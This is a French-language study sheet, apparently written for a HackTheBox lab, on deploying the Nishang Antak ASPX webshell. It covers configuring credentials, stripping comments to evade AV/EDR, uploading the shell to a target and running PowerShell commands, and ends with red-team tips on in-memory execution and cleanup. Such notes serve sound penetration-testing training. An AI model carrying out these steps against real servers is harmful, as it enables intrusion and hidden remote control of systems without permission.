🐚 Fiche Synthèse – Antak Webshell (ASPX) | TCN BLOG

📌 Qu’est-ce qu’un Webshell ASPX ?

ASPX (Active Server Page Extended) : pages dynamiques exécutées par un serveur Windows avec ASP.NET.
Utilisé comme interface côté serveur pouvant exécuter des commandes système si mal sécurisé.
Webshell ASPX : un fichier .aspx malveillant qui exécute des commandes sur l’hôte cible.

🧰 Antak Webshell – Présentation

Développé par Nishang (framework offensif PowerShell).
Fichier : antak.aspx
Interface Web imitant PowerShell.
Permet :
- Exécution de commandes PowerShell
- Téléchargement / téléversement de fichiers
- Lancement de scripts encodés
- Interactions SQL et parsing de web.config

📁 Emplacement du fichier

Sur Kali / Pwnbox :

🔧 Configuration avant usage

Copier le fichier pour le modifier :

cp /usr/share/nishang/Antak-WebShell/antak.aspx ~/Upload.aspx
Éditer la ligne 14 pour ajouter un login :
Exemple :

if (username == "htb-student" && password == "htb-student")
(Optionnel) Nettoyer le fichier :
- Supprimer les commentaires et l'art ASCII pour éviter la détection AV/EDR.

🚀 Déploiement

Télécharger le fichier ASPX sur la cible via upload web (ex : status.inlanefreight.local/files/).
Ajouter à /etc/hosts :

<IP_CIBLE> status.inlanefreight.local
Accéder au shell :

http://status.inlanefreight.local/files/upload.aspx
Se connecter avec les credentials définis (ex : htb-student).

📟 Interface Antak

Invite de commande style PowerShell
Boutons :
- Soumettre : exécute la commande
- Parcourir / Télécharger / Encoder : gestion de fichiers
- Help : liste des commandes disponibles

⚙️ Exemples de commandes

whoami
dir C:\Users
Invoke-WebRequest ...
Get-Content flag.txt

🎥 Astuce : Ressource complémentaire

Utiliser le moteur de recherche d’IPPSEC.rocks pour voir des démonstrations pratiques sur l'utilisation d'ASPX webshells (ex : box Cereal).

🛡️ Conseils de sécurité (Red Team)

Toujours protéger le webshell avec login/mot de passe.
Lancer des scripts en mémoire si possible.
Nettoyer après usage (del upload.aspx).